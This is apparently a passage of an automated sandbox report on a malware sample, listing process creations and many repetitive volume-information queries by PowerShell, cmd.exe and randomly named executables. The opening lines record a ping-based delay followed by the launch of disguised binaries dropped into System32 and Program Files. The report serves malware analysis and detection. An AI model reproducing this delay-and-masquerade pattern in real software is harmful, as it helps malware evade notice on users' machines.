                              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\r6Lr6XbTWt.exe "C:\Windows\System32\r6Lr6XbTWt.exe"
                              Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe "C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe"
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Queries volume information: C:\Users\user\Desktop\VQdUvAQ4xO.exe VolumeInformation
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
